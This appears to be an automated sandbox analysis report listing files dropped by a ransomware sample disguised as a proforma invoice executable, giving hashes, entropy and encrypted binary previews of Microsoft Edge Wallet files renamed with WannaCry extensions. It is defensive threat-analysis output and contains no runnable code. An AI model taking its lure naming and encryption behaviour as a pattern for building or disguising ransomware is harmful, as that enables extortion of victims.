                                                          Preview:WANACRY!.....H.J19.:H.......o.2..lf......)J8.A..eop.....i.....q....?....G.yJ..=..K.>.".v..)~..Z.L..T.k..oog..WS8.....O..&'A..!..B...)&u.0.WE.2.o....47iMv.5...H?LG.~....c.......).Y......|G.i.`....3.#.<..._...}u...-.Vj.....g...........,;1a...z.?F.....3...D..0....%.......@E.......D........1.P.6G...[..L...].w....o Y.....0...1.@KSD...Ou.T...:..8..w....C.,]g.X......o.....4M....+.....J....gP..E...5..)..?.Q{u.+..sSe...2..hhE....]..: ........W<.B~..U1,..=.......*.Ql.7;....A.........Q...9.....T..-"..u@./..x..........K.n.....dP..Cw:...jt...R..c.[......c..I~....1.C..U.OR...T....;.....B..D....r+M\8zG......U]..Cs.hX....DDu!@..<...p..o..p.....,.h...j.....$......1........*.K...z...d.)-`8..J..X$.m..3.oW.4..$.}.9E.z.........7z[..s....=...F......L.q.....NG.....H...$....;~..#...ln.tN..O...........,}....%@~......s.....xq.....z&!.R...*..yH....jq.:.C\%.\^56..whR..P.7..^H.1.....:..P.p..d........N.F...3........`.%...1..>.|...".I..5....\..^.9.w..z%..."..!...a..mxQ

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.LICENSE.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1608
                                                          Entropy (8bit):7.852201060571658
                                                          Encrypted:false
                                                          SSDEEP:48:bkXsSKOFblAVhkUtd843OnpfTgLs36crMMUm2AMTsEXdNW:oTPFb0hkUhe536crSmpMB0
                                                          MD5:DD39077E7DF9F2F823EB186B06FD82B4
                                                          SHA1:762272B3B490A6FE3642455D268661E4F6840478
                                                          SHA-256:210CD51B28340658B184208A0E3FC0E4FEEC99C897A4DBE5280FC5B2339FEA10
                                                          SHA-512:FB46BC1348AFC322B297757C9E9D1B98120E0180EF923F6C1386224E67D7F65980B12D7BDCE1C41D8833EAD815EE702FCBA9892BD928EA8263F92B41DD0558FC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....H.J19.:H.......o.2..lf......)J8.A..eop.....i.....q....?....G.yJ..=..K.>.".v..)~..Z.L..T.k..oog..WS8.....O..&'A..!..B...)&u.0.WE.2.o....47iMv.5...H?LG.~....c.......).Y......|G.i.`....3.#.<..._...}u...-.Vj.....g...........,;1a...z.?F.....3...D..0....%.......@E.......D........1.P.6G...[..L...].w....o Y.....0...1.@KSD...Ou.T...:..8..w....C.,]g.X......o.....4M....+.....J....gP..E...5..)..?.Q{u.+..sSe...2..hhE....]..: ........W<.B~..U1,..=.......*.Ql.7;....A.........Q...9.....T..-"..u@./..x..........K.n.....dP..Cw:...jt...R..c.[......c..I~....1.C..U.OR...T....;.....B..D....r+M\8zG......U]..Cs.hX....DDu!@..<...p..o..p.....,.h...j.....$......1........*.K...z...d.)-`8..J..X$.m..3.oW.4..$.}.9E.z.........7z[..s....=...F......L.q.....NG.....H...$....;~..#...ln.tN..O...........,}....%@~......s.....xq.....z&!.R...*..yH....jq.:.C\%.\^56..whR..P.7..^H.1.....:..P.p..d........N.F...3........`.%...1..>.|...".I..5....\..^.9.w..z%..."..!...a..mxQ

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):493400
                                                          Entropy (8bit):7.999672722265242
                                                          Encrypted:true
                                                          SSDEEP:12288:LzyrZgRDr2NePO64X104M8KqVrBqftFUoRQ8U:Le9iDaNeW64FXMFUIxU
                                                          MD5:892F43524CF91E73075D765F7156C905
                                                          SHA1:2870E0E61F18BD7BD49B3CAC140527B8ADB45758
                                                          SHA-256:0C244A89E3F7D8BDC5F52BB632511D819DA7526B7BDB50F27FB308C85C5B391F
                                                          SHA-512:810F7F65B00C2594DC12C3888163F95D02E68F592DFB1D3FE11B039D7CAC0EBD907A9D2AA25070B13636216A48C790A57D3C55CF7EFE159028BB38B4C9D33EF9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....d.....5x_p....V.....^..Hj......%{..~.r1.|.S#....l...&....I...'....H.B.I..+^;...../....G.#G...uO.BbR....Z.&.WI._..x..xr......._ ..f.>...hz...>`.Q.$3v.stJ...g...../.."8.%%&V+.qt,)M...\~(..n^.2......C.....Y4..........:.0..%Q...!0*.m..@.$.|~.....2.......s|...[r.QD.|>.+.h......>q..........b........hJ...g.......z2ch.w....pF..Ex.m2...[S.....rn..l.*h\.`..*......S.80.F]...k{K....jf]P.'..E....5..[...Q....ph.fh2u..._..LI....&..6Z.'..|.Qt...$.Po/#.8E.....6'....S.......V.....~A.....T.=.....'....4...ldzy3..b.H.#../..E|6.....J.r........R....4*..P%|.SV..9.~.ZL...$.q...#7.z...,..Z.S...2.8|0.....G...z...B..Z%...2.m. ..*..c.I....c0t/..t..r.R+... ....d^......|..4.].V..X4...........N7.D..O.9kiqs.q...../n........(.{..`..Zh. ..Cb].p......y3.".....-5.\oz.....'..........#....t..L.je5.+..Rk...B.mr2..K.bj..~.E......c....cq....:6.xD...}.}.X.........I.-..:....ku#.........X/..1.\.!...,H.U..5.0..f2...!J[ ..16..HB.uJ.V$.p....(.G.(...kn..."...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):493400
                                                          Entropy (8bit):7.999672722265242
                                                          Encrypted:true
                                                          SSDEEP:12288:LzyrZgRDr2NePO64X104M8KqVrBqftFUoRQ8U:Le9iDaNeW64FXMFUIxU
                                                          MD5:892F43524CF91E73075D765F7156C905
                                                          SHA1:2870E0E61F18BD7BD49B3CAC140527B8ADB45758
                                                          SHA-256:0C244A89E3F7D8BDC5F52BB632511D819DA7526B7BDB50F27FB308C85C5B391F
                                                          SHA-512:810F7F65B00C2594DC12C3888163F95D02E68F592DFB1D3FE11B039D7CAC0EBD907A9D2AA25070B13636216A48C790A57D3C55CF7EFE159028BB38B4C9D33EF9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....d.....5x_p....V.....^..Hj......%{..~.r1.|.S#....l...&....I...'....H.B.I..+^;...../....G.#G...uO.BbR....Z.&.WI._..x..xr......._ ..f.>...hz...>`.Q.$3v.stJ...g...../.."8.%%&V+.qt,)M...\~(..n^.2......C.....Y4..........:.0..%Q...!0*.m..@.$.|~.....2.......s|...[r.QD.|>.+.h......>q..........b........hJ...g.......z2ch.w....pF..Ex.m2...[S.....rn..l.*h\.`..*......S.80.F]...k{K....jf]P.'..E....5..[...Q....ph.fh2u..._..LI....&..6Z.'..|.Qt...$.Po/#.8E.....6'....S.......V.....~A.....T.=.....'....4...ldzy3..b.H.#../..E|6.....J.r........R....4*..P%|.SV..9.~.ZL...$.q...#7.z...,..Z.S...2.8|0.....G...z...B..Z%...2.m. ..*..c.I....c0t/..t..r.R+... ....d^......|..4.].V..X4...........N7.D..O.9kiqs.q...../n........(.{..`..Zh. ..Cb].p......y3.".....-5.\oz.....'..........#....t..L.je5.+..Rk...B.mr2..K.bj..~.E......c....cq....:6.xD...}.}.X.........I.-..:....ku#.........X/..1.\.!...,H.U..5.0..f2...!J[ ..16..HB.uJ.V$.p....(.G.(...kn..."...

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.LICENSE.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.549012189617492
                                                          Encrypted:false
                                                          SSDEEP:12:bkEr6+3odpe/91QmEfQIB/6tfQlz5yba2jNbP+pb3tAp491CErE:bkG73oTiQmEfQIB/jDyLjNyphAk9E
                                                          MD5:1876268B6922DA9CCE87CAC6C8BAA108
                                                          SHA1:EBBCCBB1661D2DE29D4E93B5210BAE77BB642106
                                                          SHA-256:4D9385DEE0003A524907ABC6D9C4DBCCB25FB70A9397D6F379A272CE097C7B32
                                                          SHA-512:2FC091D2E0C9459D7105118D722AC57B8AE065AABDFE5C5C5D458B5C4A906014BD371E2DDB7B9AB88D292730FA5F1D70257491952EB548935F2F85E931C7DA34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........k...B[........0..8........-yk&OMDC......[Uw..|f.>.v...v.M.+@..vgL.`..~Y../..L#.rmKr.a..B.+.......x........D..J....V<...0..B....d....(.<....v&.._....... ..Q..;...."/....U.%..J.v....hB.a.E;.=A^xi5...ko.8\..1RpS.n.....}..GT..q.UoU^.D|....w....'.......d.^..~.....(H..6.........rv(...F..Nw.L.3..C.@.db....k.%LB.t..&....{F......O).j .,....p.!.H..U......s..87.U..X.*.:;7U_.(...........DC~....I...7.Xi;M..N)4a..x..$.*p.....f.[...j.;.._..#..B..>..,..X8BT.n...J.v...<..b.XM80r.z.b..rS....X~)...|`.3.@3...V*.L.qs......F.%.....;...5W..G.8..c.b2.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.LICENSE.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.549012189617492
                                                          Encrypted:false
                                                          SSDEEP:12:bkEr6+3odpe/91QmEfQIB/6tfQlz5yba2jNbP+pb3tAp491CErE:bkG73oTiQmEfQIB/jDyLjNyphAk9E
                                                          MD5:1876268B6922DA9CCE87CAC6C8BAA108
                                                          SHA1:EBBCCBB1661D2DE29D4E93B5210BAE77BB642106
                                                          SHA-256:4D9385DEE0003A524907ABC6D9C4DBCCB25FB70A9397D6F379A272CE097C7B32
                                                          SHA-512:2FC091D2E0C9459D7105118D722AC57B8AE065AABDFE5C5C5D458B5C4A906014BD371E2DDB7B9AB88D292730FA5F1D70257491952EB548935F2F85E931C7DA34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........k...B[........0..8........-yk&OMDC......[Uw..|f.>.v...v.M.+@..vgL.`..~Y../..L#.rmKr.a..B.+.......x........D..J....V<...0..B....d....(.<....v&.._....... ..Q..;...."/....U.%..J.v....hB.a.E;.=A^xi5...ko.8\..1RpS.n.....}..GT..q.UoU^.D|....w....'.......d.^..~.....(H..6.........rv(...F..Nw.L.3..C.@.db....k.%LB.t..&....{F......O).j .,....p.!.H..U......s..87.U..X.*.:;7U_.(...........DC~....I...7.Xi;M..N)4a..x..$.*p.....f.[...j.;.._..#..B..>..,..X8BT.n...J.v...<..b.XM80r.z.b..rS....X~)...|`.3.@3...V*.L.qs......F.%.....;...5W..G.8..c.b2.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):329976
                                                          Entropy (8bit):7.999385055937669
                                                          Encrypted:true
                                                          SSDEEP:6144:7GK6GW7nnw5kt0AT324znle19FekiZb3xLBinVUzaxcQzdOemnKGV6:b0qA32aqeqVE+dwKk6
                                                          MD5:9577A50641282E10C906552D793846EE
                                                          SHA1:85F6713B0625B1F3BB01CFC79F56606596867825
                                                          SHA-256:51A9C0BE5972B390A360E9D77779ABF76AB89BFA163B7644CA01BA8A0EE53006
                                                          SHA-512:9E07474DB3E4BFA3D14A37D35796532A524036C02CA07072B53F16C64ED00320D6B08448B155A54ADB76D1C49E0B64BA06A49C1922355D13832C229AFC2784FB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........1....{..U.8.....b..[.\...M.......cfW..C..O......f.}4..]...O4..=zF..JQ.S...W......_....HVpa-....z7...'.......P......LA.~X...j...A-B....I..g..].i.......w.Z.'.....\..`Q ....<I.mm....p......."...q8./.zX.BD..........[. ....c{..9..@.....Kq............9..wdB.1.1.._...{..("..c...0 ..Hr..Kmg....(.O.{x...Y.>}L.8/5.8.".2.l..9zSR..u\....!|.6|..?S......![..rn.J...l...O...ur%.....M....V./#7..l..#W..Q.8B.'/.^.i...B,.<0..J.G........._..1<h...sI.di*.e.....4...!.t$9........pK..i.f."..,`TL;..+y..0(]..$.b.6.....V4.....t..`....s.?1.~.7@..K.@tA..-..T..............a2.C."..$I.Y}*...g.O..J...y.\xG|<.V.../...:..3<{...>..*./..v..a=.>.G-|p)._^#o...Y...$......5.....<...pL.tv.|]...........uN..yb..Q...z.yw......<....[..<.jr.XRB....-..8.C.ss.G.W.V$.z.r..zb.[....[.Ox..y.}..zW5.`1........I...C......L.=..~....<.....`y......h......C....>L\...B....*..=.y/.!..i....:6F....v.:v...L.9.u...L<..V..xa&..........4c...y...y...s....q..M4..P..q.d..?G....t_...M..+bC.'O.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification\notification_fast.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):329976
                                                          Entropy (8bit):7.999385055937669
                                                          Encrypted:true
                                                          SSDEEP:6144:7GK6GW7nnw5kt0AT324znle19FekiZb3xLBinVUzaxcQzdOemnKGV6:b0qA32aqeqVE+dwKk6
                                                          MD5:9577A50641282E10C906552D793846EE
                                                          SHA1:85F6713B0625B1F3BB01CFC79F56606596867825
                                                          SHA-256:51A9C0BE5972B390A360E9D77779ABF76AB89BFA163B7644CA01BA8A0EE53006
                                                          SHA-512:9E07474DB3E4BFA3D14A37D35796532A524036C02CA07072B53F16C64ED00320D6B08448B155A54ADB76D1C49E0B64BA06A49C1922355D13832C229AFC2784FB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........1....{..U.8.....b..[.\...M.......cfW..C..O......f.}4..]...O4..=zF..JQ.S...W......_....HVpa-....z7...'.......P......LA.~X...j...A-B....I..g..].i.......w.Z.'.....\..`Q ....<I.mm....p......."...q8./.zX.BD..........[. ....c{..9..@.....Kq............9..wdB.1.1.._...{..("..c...0 ..Hr..Kmg....(.O.{x...Y.>}L.8/5.8.".2.l..9zSR..u\....!|.6|..?S......![..rn.J...l...O...ur%.....M....V./#7..l..#W..Q.8B.'/.^.i...B,.<0..J.G........._..1<h...sI.di*.e.....4...!.t$9........pK..i.f."..,`TL;..+y..0(]..$.b.6.....V4.....t..`....s.?1.~.7@..K.@tA..-..T..............a2.C."..$I.Y}*...g.O..J...y.\xG|<.V.../...:..3<{...>..*./..v..a=.>.G-|p)._^#o...Y...$......5.....<...pL.tv.|]...........uN..yb..Q...z.yw......<....[..<.jr.XRB....-..8.C.ss.G.W.V$.z.r..zb.[....[.Ox..y.}..zW5.`1........I...C......L.=..~....<.....`y......h......C....>L\...B....*..=.y/.!..i....:6F....v.:v...L.9.u...L<..V..xa&..........4c...y...y...s....q..M4..P..q.d..?G....t_...M..+bC.'O.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.LICENSE.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1608
                                                          Entropy (8bit):7.863949857518728
                                                          Encrypted:false
                                                          SSDEEP:48:bkT8NOTWFCG9a3UqV3Xlle9WK6SqRwQOQHeA7UwS:oTSOlUo31leEK6NRwYHmwS
                                                          MD5:1CFC93BAFC8E93D573774DADF4FB0C0A
                                                          SHA1:996F5F3F56068EEBDE265818C00B2C2BDA556545
                                                          SHA-256:2FE53FDBEDBDB104025BC0E54B85C962B2D83580E1DECF074449532A6A02C39F
                                                          SHA-512:4E6AAF44C633C3C698EF0BAF1850B64F2D6568D951F198FF139A10F8AA2D560A333C9B09D6BA14F635750DCC16268F997462CCBC68E3F78CE8A87C727A6C2BF2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....p..`.V..d...cgt...."9e.yZ.I.rG..XF...e.B.].....A<%....\g.h.u..yr...fP....._..p.Hl.+-../O4]].K.B_^;.....m....j..,W...............[s$].0.f.'...D/....Y..8.Wgz...U....1.GG.c....}..w$.......r.......ob.G'A......u..._.5..4....>x..O*...n..o.....H;z6.Dy....%........?.sv|5..(.....1q...t..<..r..WDz...".._.\....l......'.....OQ.5..!.......C.. ..<.'I.S5A..@....A.sOaI.....%XI.&.9.....0d....AN.....r)...\0..`.........v.....Cu<i_.....bc....xm. .y...0...|..%k.....$..!..HAB$....V.+....:....4.f..<.,sZ.hsHE...)7&...D.* .i.o.k.%.2y.....>\./f....Uf. ._H...Xx.........g%..YB.../..$ .....2..j......B..c...>z_.........,...?..`....=W.?n0..Y!&F.....>3Ay`..DZ.i...\...m.....]...ka...z....t...."..O...E..A....1+..Cu.).<..M..,..Vg0.$d...M.......|...sO. .0.6...v.1...PP..h.....XK:..A.9...~..o.g...x...K..n/..u.mZ.^}Q.......~..$..-.y..j..S....w...l.... .tr....`...(g.N....8n......g...o.. ..#1.x....1..<. d..1...V...2..uNJ..M8.a.8.0.r...>..%.F.L......D<.qe.Ey.GjJ+.y..r]..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.LICENSE.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1608
                                                          Entropy (8bit):7.863949857518728
                                                          Encrypted:false
                                                          SSDEEP:48:bkT8NOTWFCG9a3UqV3Xlle9WK6SqRwQOQHeA7UwS:oTSOlUo31leEK6NRwYHmwS
                                                          MD5:1CFC93BAFC8E93D573774DADF4FB0C0A
                                                          SHA1:996F5F3F56068EEBDE265818C00B2C2BDA556545
                                                          SHA-256:2FE53FDBEDBDB104025BC0E54B85C962B2D83580E1DECF074449532A6A02C39F
                                                          SHA-512:4E6AAF44C633C3C698EF0BAF1850B64F2D6568D951F198FF139A10F8AA2D560A333C9B09D6BA14F635750DCC16268F997462CCBC68E3F78CE8A87C727A6C2BF2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....p..`.V..d...cgt...."9e.yZ.I.rG..XF...e.B.].....A<%....\g.h.u..yr...fP....._..p.Hl.+-../O4]].K.B_^;.....m....j..,W...............[s$].0.f.'...D/....Y..8.Wgz...U....1.GG.c....}..w$.......r.......ob.G'A......u..._.5..4....>x..O*...n..o.....H;z6.Dy....%........?.sv|5..(.....1q...t..<..r..WDz...".._.\....l......'.....OQ.5..!.......C.. ..<.'I.S5A..@....A.sOaI.....%XI.&.9.....0d....AN.....r)...\0..`.........v.....Cu<i_.....bc....xm. .y...0...|..%k.....$..!..HAB$....V.+....:....4.f..<.,sZ.hsHE...)7&...D.* .i.o.k.%.2y.....>\./f....Uf. ._H...Xx.........g%..YB.../..$ .....2..j......B..c...>z_.........,...?..`....=W.?n0..Y!&F.....>3Ay`..DZ.i...\...m.....]...ka...z....t...."..O...E..A....1+..Cu.).<..M..,..Vg0.$d...M.......|...sO. .0.6...v.1...PP..h.....XK:..A.9...~..o.g...x...K..n/..u.mZ.^}Q.......~..$..-.y..j..S....w...l.... .tr....`...(g.N....8n......g...o.. ..#1.x....1..<. d..1...V...2..uNJ..M8.a.8.0.r...>..%.F.L......D<.qe.Ey.GjJ+.y..r]..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):552536
                                                          Entropy (8bit):7.999603439915225
                                                          Encrypted:true
                                                          SSDEEP:12288:CNn8vzZXc2h/47ATbzeDlG23tQeALGak4FiKk0rJSi3dBwAaSvB:CatXc2h/47abqDlG23tTmwHKV1SuaSp
                                                          MD5:DB515E5D655AAB76886A0AF7598D02CA
                                                          SHA1:E68A16D5D216BA8319BE5975EEA446BA6A8F192C
                                                          SHA-256:BA83319ED612009E191AE5EA594B23312FC7C876EB0E2C2A290D466DCF46D239
                                                          SHA-512:62BF83E85CA4BA776E8798AE5CE613AEB30727BF961C795A6EE0EBD5DC48FD5325EADBD8A408EDA91A869525808010C57D32C6EC38A1CBC601A3B0AC0CF855EE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z...z.`.../..v..#...e3.33...H.^....B...d C.w.^.l..N9........<.S.)..X.G8...m..G#......(.j.8....L1.g.>Bx0+.u..N..x[c..%...l..9...f.*z.z.......2L....GO....W8.S..uyh.Y...J.A..].....D..en.{X.&...|s.t..2...L..u......,i.I..........P:0t..l../...}` -f2....9m.............8...............r.u.....k..m.4..[o.a.2e.9.?'.\b.........'.J.tE;..'=.x..k^....P..y....gk4_.O..@...W..v.>q....e?....K...W....."<Z3.....$...u.9"=Q.k..}.".t......t.}.H3......K.......|."q..........!..\..0.~+..>....~8.....G...u.v&...P....v+.Y.....J...@.....Kn...2.!L.....z...W.)>.."...8wC.X...QK....gw...70rZg;x..(b..0ol"..T?E...)>...H....X....^.X.%8.&.......0]......V..D..\|j....u}..*.f..P0(k....c5..n}k.b./Xi^.{]..=.8.?!.......P.M......d..(...:..Z.A......4gD..1.y......X...B.g..YZ......;{J..s.4.....f.S8...0.6.X..5O..V,.U.n..ep....@..}.S.sE.$.5a.f.J.^...L..{P..8..;}...&,..<3...h....]..Onb..0T.<).e.j.#.@...-..L.......q.p."...W1.n#8.......G........r,o).2%q..".n..S.Q.m....`nHT

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card\tokenized-card.bundle.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):552536
                                                          Entropy (8bit):7.999603439915225
                                                          Encrypted:true
                                                          SSDEEP:12288:CNn8vzZXc2h/47ATbzeDlG23tQeALGak4FiKk0rJSi3dBwAaSvB:CatXc2h/47abqDlG23tTmwHKV1SuaSp
                                                          MD5:DB515E5D655AAB76886A0AF7598D02CA
                                                          SHA1:E68A16D5D216BA8319BE5975EEA446BA6A8F192C
                                                          SHA-256:BA83319ED612009E191AE5EA594B23312FC7C876EB0E2C2A290D466DCF46D239
                                                          SHA-512:62BF83E85CA4BA776E8798AE5CE613AEB30727BF961C795A6EE0EBD5DC48FD5325EADBD8A408EDA91A869525808010C57D32C6EC38A1CBC601A3B0AC0CF855EE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z...z.`.../..v..#...e3.33...H.^....B...d C.w.^.l..N9........<.S.)..X.G8...m..G#......(.j.8....L1.g.>Bx0+.u..N..x[c..%...l..9...f.*z.z.......2L....GO....W8.S..uyh.Y...J.A..].....D..en.{X.&...|s.t..2...L..u......,i.I..........P:0t..l../...}` -f2....9m.............8...............r.u.....k..m.4..[o.a.2e.9.?'.\b.........'.J.tE;..'=.x..k^....P..y....gk4_.O..@...W..v.>q....e?....K...W....."<Z3.....$...u.9"=Q.k..}.".t......t.}.H3......K.......|."q..........!..\..0.~+..>....~8.....G...u.v&...P....v+.Y.....J...@.....Kn...2.!L.....z...W.)>.."...8wC.X...QK....gw...70rZg;x..(b..0ol"..T?E...)>...H....X....^.X.%8.&.......0]......V..D..\|j....u}..*.f..P0(k....c5..n}k.b./Xi^.{]..=.8.?!.......P.M......d..(...:..Z.A......4gD..1.y......X...B.g..YZ......;{J..s.4.....f.S8...0.6.X..5O..V,.U.n..ep....@..}.S.sE.$.5a.f.J.^...L..{P..8..;}...&,..<3...h....]..Onb..0T.<).e.j.#.@...-..L.......q.p."...W1.n#8.......G........r,o).2%q..".n..S.Q.m....`nHT

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\app-setup.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.227463602520149
                                                          Encrypted:false
                                                          SSDEEP:6:bkEPUGXQ5G1dSPbQDpeD0ldIz9HeQTB2AAqPE4pUYdxlhJrps60H5RMXI+xaoX3:bkE6Wdj1aWu12APTeYprG6a5RMXf/X3
                                                          MD5:8F1A40D674D8F0AE4DB0002012495B03
                                                          SHA1:429B8E30B11B075FEE4002E93BBE0304CF8E3E30
                                                          SHA-256:43F93FD19AD8E11C964CFBEFAD15EE10C47F1D9FC6CF8DF5E7EFA57258A65602
                                                          SHA-512:A5F4C6CA530DAEC30ACE8BC06044AADA4EF6F87E4477AA35CC433EBDA6597636A0154DBDAA7C2A5FFE133C23B5B6BC3D9CAC183C765EA10196616620B0F67A05
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........}.x...]|......u..M`........n.y..v......?...3..5.P@j.`..RA.!*L...).........g....J...'.8..?...\.".*R'{.8.~F.>5NX......... t[.8......&%..B.x.....FQ4.x........&...[L.]Gy^...OIo..;._.8.qa.......A.kA.>...z..P...I..sB......z..B.=H L..r..*.......%.........8.t.)o..ko..,....aX]L.W...^fV...z...X...^_4;

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\app-setup.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.227463602520149
                                                          Encrypted:false
                                                          SSDEEP:6:bkEPUGXQ5G1dSPbQDpeD0ldIz9HeQTB2AAqPE4pUYdxlhJrps60H5RMXI+xaoX3:bkE6Wdj1aWu12APTeYprG6a5RMXf/X3
                                                          MD5:8F1A40D674D8F0AE4DB0002012495B03
                                                          SHA1:429B8E30B11B075FEE4002E93BBE0304CF8E3E30
                                                          SHA-256:43F93FD19AD8E11C964CFBEFAD15EE10C47F1D9FC6CF8DF5E7EFA57258A65602
                                                          SHA-512:A5F4C6CA530DAEC30ACE8BC06044AADA4EF6F87E4477AA35CC433EBDA6597636A0154DBDAA7C2A5FFE133C23B5B6BC3D9CAC183C765EA10196616620B0F67A05
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........}.x...]|......u..M`........n.y..v......?...3..5.P@j.`..RA.!*L...).........g....J...'.8..?...\.".*R'{.8.~F.>5NX......... t[.8......&%..B.x.....FQ4.x........&...[L.]Gy^...OIo..;._.8.qa.......A.kA.>...z..P...I..sB......z..B.=H L..r..*.......%.........8.t.)o..ko..,....aX]L.W...^fV...z...X...^_4;

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout\load-ec-i18n.bundle.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16456
                                                          Entropy (8bit):7.9883821885952955
                                                          Encrypted:false
                                                          SSDEEP:384:5LX5z7uTtgv9gh1tQSV9/zT+K4Hs9LhX6wAW:pX5zytM9gh1Ks579I1W
                                                          MD5:D785B6C7E5E910667517CED426221AF4
                                                          SHA1:2B8C50FCEF9D3A588DC812A963642E3BF8E17759
                                                          SHA-256:AAE4CA699F297A43828907652A62941E55BF313070304B38FA2B3D5158B3ADE2
                                                          SHA-512:3A5C2A2AA4C810B547BC70BA15CCBC00A193ED22CC56DE03CABB2322E05017F0BFFF4D3DCC351B9E37F4D492EFEB7BF1493AF99BFFAFFFB24C77A45FEA5936ED
                                                          Malicious:false
                                                          Reputation:unknown
